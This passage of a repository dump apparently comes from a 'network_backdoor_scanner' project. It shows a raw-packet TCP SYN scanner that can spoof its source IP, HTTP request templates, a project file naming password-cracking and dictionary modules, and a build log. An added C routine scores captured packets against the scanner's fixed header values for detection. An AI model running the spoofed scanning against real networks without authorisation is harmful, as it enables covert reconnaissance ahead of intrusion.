            if (htons(ETH_PROTO_IP)==eth_header_->proto) {
                ip_header_=(point_ip_header)(data+sizeof(eth_header));
                tcp_header_=(point_tcp_header)(data+sizeof(eth_header)+sizeof(ip_header));
                if (inet_addr(target_ip)==ip_header_->sourceIP && IPPROTO_TCP==ip_header_->proto && htons(target_port)==tcp_header_->th_sorc_port)
                    if ((tcp_header_->th_flags & TH_SYN) && (tcp_header_->th_flags & TH_ACK))
                        return true;
            }
            new_tick=GetTickCount();
        } while ((new_tick-old_tick)<=SCAN_TCP_PORT_TIMEOUT);
    }
    return false;
}

bool scan_tcp(const char* target_ip,unsigned short target_port) {
    return scan_tcp_fake_ip(target_ip,target_port,local_ip,SCAN_TCP_PORT);
}

void scan_tcp_clean(void) {
    pcap_close(adapter);
    adapter=NULL;
}

--------------------------------------------------------------------------------
/scanner_framework/scan_tcp.h:
--------------------------------------------------------------------------------

#ifndef _SCAN_TCP_H__
#define _SCAN_TCP_H__

#define ADAPTER_INDEX 1

#define PACKET_SEND_BUFFER 1024
#define PACKET_RECV_BUFFER 1024
#define PAGE_BUFFER_LENGTH 1024*10

#define SCAN_TCP_PORT_TIMEOUT 500
#define SCAN_TCP_GET_DATA_TIME 5000

#define SCAN_TCP_PORT 443 // https

typedef struct {
    unsigned short port;
    char proto[10];
    unsigned int data_length;
    char* data;
} scan_tcp_port_information;

bool scan_tcp_init(void);
bool scan_tcp(const char* target_ip,unsigned short target_port);
bool scan_tcp_fake_ip(const char* target_ip,unsigned short target_port,const char* fake_ip,unsigned short fake_port);
bool scan_tcp_get_data(const char* target_ip,unsigned short target_port,const char* path,const char* target_host,scan_tcp_port_information* output_data);
void scan_tcp_clean(void);

unsigned int scan_tcp_bind(unsigned short local_port);
unsigned int scan_tcp_accept(unsigned int tcp_handle);
unsigned int scan_tcp_connect(const char* target_ip,unsigned short target_port);
bool scan_tcp_set_recv_block(unsigned int tcp_handle,unsigned int block_time);
void scan_tcp_send(unsigned int tcp_handle,const char* buffer,unsigned int buffer_length);
unsigned int scan_tcp_recv(unsigned int tcp_handle,char* buffer,unsigned int buffer_length);
void scan_tcp_disconnect(unsigned int tcp_handle);

#endif
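The SYN probe built by scan_tcp_fake_ip() in scan_tcp.cpp carries several hard-coded header values, which makes it recognisable in a packet capture. The C check below is an added example, not part of this repository: it scores a captured Ethernet frame against those values. It assumes the sender is the little-endian x86 build (the project file links with /machine:I386), so that th_seq and ident, which are assigned without htonl()/htons(), leave the host byte-swapped, and it assumes ident is a 16-bit field in the usual IPv4 header layout; probe_score and both sample frames are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example. Constants are the values scan_tcp_fake_ip() assigns, written
 * as they appear on the wire from a little-endian build (assumption):
 * th_seq=0x1234432 and ident=10 are stored without htonl()/htons(). */
static const uint8_t PROBE_SEQ[4]   = {0x32, 0x44, 0x23, 0x01};
static const uint8_t PROBE_ID[2]    = {0x0a, 0x00};
static const uint8_t PROBE_OPTS[12] = {0x02, 0x04, 0x05, 0xb4, 0x01, 0x03,
                                       0x03, 0x02, 0x01, 0x01, 0x04, 0x02};

/* Returns how many of five static fields match (0..5), or -1 when the frame
 * is truncated, fragmented, or not an IPv4 TCP SYN without ACK. */
int probe_score(const uint8_t *f, size_t len)
{
    if (len < 14 + 20 + 20 || f[12] != 0x08 || f[13] != 0x00)
        return -1;
    const uint8_t *ip = f + 14;
    size_t ihl = (size_t)(ip[0] & 0x0f) * 4;
    if ((ip[0] >> 4) != 4 || ihl < 20 || ip[9] != 6 || len < 14 + ihl + 20
        || (ip[6] & 0x1f) || ip[7])                 /* non-zero fragment offset */
        return -1;
    const uint8_t *tcp = ip + ihl;
    size_t thl = (size_t)(tcp[12] >> 4) * 4;
    if (thl < 20 || len < 14 + ihl + thl || (tcp[13] & 0x12) != 0x02)
        return -1;

    int score = 0;
    score += memcmp(tcp + 4, PROBE_SEQ, 4) == 0;    /* fixed sequence number */
    score += memcmp(ip + 4, PROBE_ID, 2) == 0;      /* fixed IP identification */
    score += ip[8] == 128;                          /* ttl=128 */
    score += tcp[14] == 0x10 && tcp[15] == 0x00;    /* th_win=htons(4096) */
    score += thl == 32 && memcmp(tcp + 20, PROBE_OPTS, 12) == 0;
    return score;
}

/* Constructed frames (documentation addresses, checksums left zero). */
static const uint8_t SAMPLE_SYN[66] = {             /* scanner-style probe */
    0x02,0,0,0,0,0x02, 0x02,0,0,0,0,0x01, 0x08,0x00,
    0x45,0x00,0x00,0x34, 0x0a,0x00, 0x40,0x00, 0x80,0x06, 0,0,
    192,0,2,10, 192,0,2,20,
    0x01,0xbb, 0x00,0x50, 0x32,0x44,0x23,0x01, 0,0,0,0,
    0x80,0x02, 0x10,0x00, 0,0, 0,0,
    0x02,0x04,0x05,0xb4,0x01,0x03,0x03,0x02,0x01,0x01,0x04,0x02 };
static const uint8_t BENIGN_SYN[66] = {             /* ordinary Windows-style SYN */
    0x02,0,0,0,0,0x02, 0x02,0,0,0,0,0x03, 0x08,0x00,
    0x45,0x00,0x00,0x34, 0x5c,0x21, 0x40,0x00, 0x80,0x06, 0,0,
    192,0,2,30, 192,0,2,20,
    0xc3,0x50, 0x00,0x50, 0x9e,0x17,0x6b,0x3a, 0,0,0,0,
    0x80,0x02, 0x20,0x00, 0,0, 0,0,
    0x02,0x04,0x05,0xb4,0x01,0x03,0x03,0x08,0x01,0x01,0x04,0x02 };

int main(void)
{
    printf("scanner-style SYN: %d/5\n", probe_score(SAMPLE_SYN, sizeof SAMPLE_SYN));
    printf("ordinary SYN:      %d/5\n", probe_score(BENIGN_SYN, sizeof BENIGN_SYN));
    return 0;
}
```

The ordinary SYN still scores 1 because TTL 128 is the Windows default, so a rule should require several fields together, with the fixed sequence number and IP identification carrying the most weight. The source address is not part of the score because scan_tcp_fake_ip() lets the caller set it.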
--------------------------------------------------------------------------------
/scanner_framework/scan_tcp_header.h:
--------------------------------------------------------------------------------

#ifndef _SCAN_TCP_HEADER_H__
#define _SCAN_TCP_HEADER_H__

#define SCAN_TCP_HEADER_HTTP "GET %s HTTP/1.1\r\n" \
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0\r\n\r\n"
#define SCAN_TCP_HEADER_HTTP_HOST "GET %s HTTP/1.1\r\n" \
    "HOST: %s\r\n" \
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0\r\n\r\n"
#define SCAN_TCP_HEADER_TELNET ""

#endif

--------------------------------------------------------------------------------
/scanner_framework/scanner_framework.dsp:
--------------------------------------------------------------------------------
# Microsoft Developer Studio Project File - Name="scanner_framework" - Package Owner=<4>
# Microsoft Developer Studio Generated Build File, Format Version 6.00
# ** DO NOT EDIT **

# TARGTYPE "Win32 (x86) Console Application" 0x0103

CFG=scanner_framework - Win32 Debug
!MESSAGE This is not a valid makefile. To build this project using NMAKE,
!MESSAGE use the Export Makefile command and run
!MESSAGE
!MESSAGE NMAKE /f "scanner_framework.mak".
!MESSAGE
!MESSAGE You can specify a configuration when running NMAKE
!MESSAGE by defining the macro CFG on the command line. For example:
!MESSAGE
!MESSAGE NMAKE /f "scanner_framework.mak" CFG="scanner_framework - Win32 Debug"
!MESSAGE
!MESSAGE Possible choices for configuration are:
!MESSAGE
!MESSAGE "scanner_framework - Win32 Release" (based on "Win32 (x86) Console Application")
!MESSAGE "scanner_framework - Win32 Debug" (based on "Win32 (x86) Console Application")
!MESSAGE

# Begin Project
# PROP AllowPerConfigDependencies 0
# PROP Scc_ProjName ""
# PROP Scc_LocalPath ""
CPP=cl.exe
RSC=rc.exe

!IF "$(CFG)" == "scanner_framework - Win32 Release"

# PROP BASE Use_MFC 0
# PROP BASE Use_Debug_Libraries 0
# PROP BASE Output_Dir "Release"
# PROP BASE Intermediate_Dir "Release"
# PROP BASE Target_Dir ""
# PROP Use_MFC 0
# PROP Use_Debug_Libraries 0
# PROP Output_Dir "Release"
# PROP Intermediate_Dir "Release"
# PROP Ignore_Export_Lib 0
# PROP Target_Dir ""
# ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
# ADD CPP /nologo /W3 /GX /O1 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c
# ADD BASE RSC /l 0x804 /d "NDEBUG"
# ADD RSC /l 0x804 /d "NDEBUG"
BSC32=bscmake.exe
# ADD BASE BSC32 /nologo
# ADD BSC32 /nologo
LINK32=link.exe
# ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386
# ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386

!ELSEIF "$(CFG)" == "scanner_framework - Win32 Debug"

# PROP BASE Use_MFC 0
# PROP BASE Use_Debug_Libraries 1
# PROP BASE Output_Dir "Debug"
# PROP BASE Intermediate_Dir "Debug"
# PROP BASE Target_Dir ""
# PROP Use_MFC 0
# PROP Use_Debug_Libraries 1
# PROP Output_Dir "Debug"
# PROP Intermediate_Dir "Debug"
# PROP Target_Dir ""
# ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
# ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c
# ADD BASE RSC /l 0x804 /d "_DEBUG"
# ADD RSC /l 0x804 /d "_DEBUG"
BSC32=bscmake.exe
# ADD BASE BSC32 /nologo
# ADD BSC32 /nologo
LINK32=link.exe
# ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept
# ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept

!ENDIF

# Begin Target

# Name "scanner_framework - Win32 Release"
# Name "scanner_framework - Win32 Debug"
# Begin Group "Source Files"

# PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat"
# Begin Source File

SOURCE=.\encoder_base64.cpp
# End Source File
# Begin Source File

SOURCE=.\local_information.cpp
# End Source File
# Begin Source File

SOURCE=.\local_network.cpp
# End Source File
# Begin Source File

SOURCE=.\local_thread.cpp
# End Source File
# Begin Source File

SOURCE=.\main.cpp
# End Source File
# Begin Source File

SOURCE=.\network_crack.cpp
# End Source File
# Begin Source File

SOURCE=.\network_encoder.cpp
# End Source File
# Begin Source File

SOURCE=.\network_route.cpp
# End Source File
# Begin Source File

SOURCE=.\network_server_dns.cpp
# End Source File
# Begin Source File

SOURCE=.\resolver_dictionary.cpp
# End Source File
# Begin Source File

SOURCE=.\resolver_express.cpp
# End Source File
# Begin Source File

SOURCE=.\resolver_html.cpp
# End Source File
# Begin Source File

SOURCE=.\resolver_http.cpp
# End Source File
# Begin Source File

SOURCE=.\resolver_string.cpp
# End Source File
# Begin Source File

SOURCE=.\scan_arp.cpp
# End Source File
# Begin Source File

SOURCE=.\scan_icmp.cpp
# End Source File
# Begin Source File

SOURCE=.\scan_tcp.cpp
# End Source File
# End Group
# Begin Group "Header Files"

# PROP Default_Filter "h;hpp;hxx;hm;inl"
# Begin Source File

SOURCE=.\encoder_base64.h
# End Source File
# Begin Source File

SOURCE=.\local_information.h
# End Source File
# Begin Source File

SOURCE=.\local_network.h
# End Source File
# Begin Source File

SOURCE=.\local_thread.h
# End Source File
# Begin Source File

SOURCE=.\network_crack.h
# End Source File
# Begin Source File

SOURCE=.\network_dictionary.h
# End Source File
# Begin Source File

SOURCE=.\network_encoder.h
# End Source File
# Begin Source File

SOURCE=.\network_route.h
# End Source File
# Begin Source File

SOURCE=.\network_server_dns.h
# End Source File
# Begin Source File

SOURCE=.\resolver_dictionary.h
# End Source File
# Begin Source File

SOURCE=.\resolver_express.h
# End Source File
# Begin Source File

SOURCE=.\resolver_html.h
# End Source File
# Begin Source File

SOURCE=.\resolver_http.h
# End Source File
# Begin Source File

SOURCE=.\resolver_string.h
# End Source File
# Begin Source File

SOURCE=.\scan_arp.h
# End Source File
# Begin Source File

SOURCE=.\scan_icmp.h
# End Source File
# Begin Source File

SOURCE=.\scan_tcp.h
# End Source File
# Begin Source File

SOURCE=.\scan_tcp_header.h
# End Source File
# End Group
# Begin Group "Resource Files"

# PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe"
# End Group
# End Target
# End Project

--------------------------------------------------------------------------------
/scanner_framework/scanner_framework.dsw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/scanner_framework.dsw
--------------------------------------------------------------------------------
/scanner_framework/scanner_framework.ncb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/scanner_framework.ncb
--------------------------------------------------------------------------------
/scanner_framework/scanner_framework.opt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/scanner_framework.opt
--------------------------------------------------------------------------------
/scanner_framework/scanner_framework.plg:
--------------------------------------------------------------------------------
Build Log

--------------------Configuration: scanner_framework - Win32 Release--------------------

Command Lines

Creating temporary file "C:\Users\ADMINI~1\AppData\Local\Temp\RSPBB67.tmp" with contents
[
/nologo /ML /W3 /GX /O1 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /Fp"Release/scanner_framework.pch" /YX /Fo"Release/" /Fd"Release/" /FD /c
"C:\Users\Administrator\Desktop\code_file\scaner\scanner_framework\main.cpp"
]
Creating command line "cl.exe @C:\Users\ADMINI~1\AppData\Local\Temp\RSPBB67.tmp"
Creating temporary file "C:\Users\ADMINI~1\AppData\Local\Temp\RSPBB68.tmp" with contents
[
kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /incremental:no /pdb:"Release/scanner_framework.pdb" /machine:I386 /out:"Release/scanner_framework.exe"
.\Release\encoder_base64.obj
.\Release\local_network.obj
.\Release\main.obj
.\Release\network_crack.obj
.\Release\network_encoder.obj
.\Release\network_route.obj
.\Release\network_server_dns.obj
.\Release\resolver_dictionary.obj
.\Release\resolver_express.obj
.\Release\resolver_html.obj
.\Release\resolver_http.obj
.\Release\resolver_string.obj
.\Release\scan_arp.obj
.\Release\scan_icmp.obj
.\Release\scan_tcp.obj
.\Release\local_information.obj
]
Creating command line "link.exe @C:\Users\ADMINI~1\AppData\Local\Temp\RSPBB68.tmp"

Output Window

Compiling...
main.cpp
Linking...

Results

scanner_framework.exe - 0 error(s), 0 warning(s)

--------------------------------------------------------------------------------